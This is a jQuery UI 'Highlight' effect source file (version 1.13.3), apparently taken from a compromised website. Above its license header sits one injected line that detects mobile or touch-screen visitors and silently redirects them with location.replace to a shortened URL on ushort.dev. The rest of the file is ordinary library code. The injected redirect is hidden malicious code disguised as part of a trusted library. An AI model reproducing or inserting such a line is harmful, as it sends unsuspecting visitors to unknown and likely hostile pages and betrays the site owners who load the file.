1(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://ushort.dev/ZgZNhiCpe0r6");
2/*!
3 * jQuery UI Effects Highlight 1.13.3
4 * https://jqueryui.com
5 *
6 * Copyright OpenJS Foundation and other contributors
7 * Released under the MIT license.
8 * https://jquery.org/license
9 */
10
11//>>label: Highlight Effect
12//>>group: Effects
13//>>description: Highlights the background of an element in a defined color for a custom duration.
14//>>docs: https://api.jqueryui.com/highlight-effect/
15//>>demos: https://jqueryui.com/effect/
16
17( function( factory ) {
18 "use strict";
19
20 if ( typeof define === "function" && define.amd ) {
21
22 // AMD. Register as an anonymous module.
23 define( [
24 "jquery",
25 "../version",
26 "../effect"
27 ], factory );
28 } else {
29
30 // Browser globals
31 factory( jQuery );
32 }
33} )( function( $ ) {
34"use strict";
35
36return $.effects.define( "highlight", "show", function( options, done ) {
37 var element = $( this ),
38 animation = {
39 backgroundColor: element.css( "backgroundColor" )
40 };
41
42 if ( options.mode === "hide" ) {
43 animation.opacity = 0;
44 }
45
46 $.effects.saveStyle( element );
47
48 element
49 .css( {
50 backgroundImage: "none",
51 backgroundColor: options.color || "#ffff99"
52 } )
53 .animate( animation, {
54 queue: false,
55 duration: options.duration,
56 easing: options.easing,
57 complete: done
58 } );
59} );
60
61} );
62